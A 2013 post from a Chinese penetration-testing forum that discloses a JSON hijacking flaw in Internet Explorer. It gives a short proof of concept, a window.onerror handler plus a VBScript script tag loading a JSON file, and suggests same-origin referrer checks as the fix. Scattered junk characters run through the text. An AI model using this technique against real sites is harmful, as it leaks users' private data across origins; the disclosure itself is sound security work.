中国网络渗透测试联盟

标题: IE通用JSON劫持漏洞 [打印本页]

作者: admin    时间: 2013-2-23 11:33
标题: IE通用JSON劫持漏洞
简要描述:' T8 ?. P* [% ~/ [
" u& N% M& F5 x  X4 G* z! ^
由于某些资源容器对数据处理不当导致json劫持漏洞.% y' v. z! E5 u5 v% j
详细说明:# F( @' k* J: y3 ~0 r- V
由于ie支持vbscript,所以script元素可以指定成vbscript语言:* g, J- I5 ^! W8 f7 `- s
<script language=vbscript></script>4 q) H8 o" C; Q% {7 b- D7 Q

/ J* H$ ]# w5 `$ ?当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据./ z' e+ Y. Q/ W4 _% i
漏洞证明:
& \& j" p  E$ J<script>. D" s3 Z! A5 w2 N
window.onerror=function(_){
2 G  T1 e# N+ _* Salert(_)
  ?3 ]2 j! C) F, \" E1 q( ^0 P. h}* @& [; |2 F1 e# n# u
</script>
  l" m3 N3 O* u/ Q<script language=vbscript src=1.json></script>
; E6 Q# b4 N2 s! n : ^- J: f9 O) \2 {

- `! p$ W( O, z7 @- X6 \1.json:
6 |; Q) h3 n& M& G9 l: H" J8 Y[{"name":"sogili","age":19}]
( l  K; i. \0 Z5 W修复方案:4 f1 S' {; V, f
网站业务对于这个问题可以通过验证referrer是否为同源来防御




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2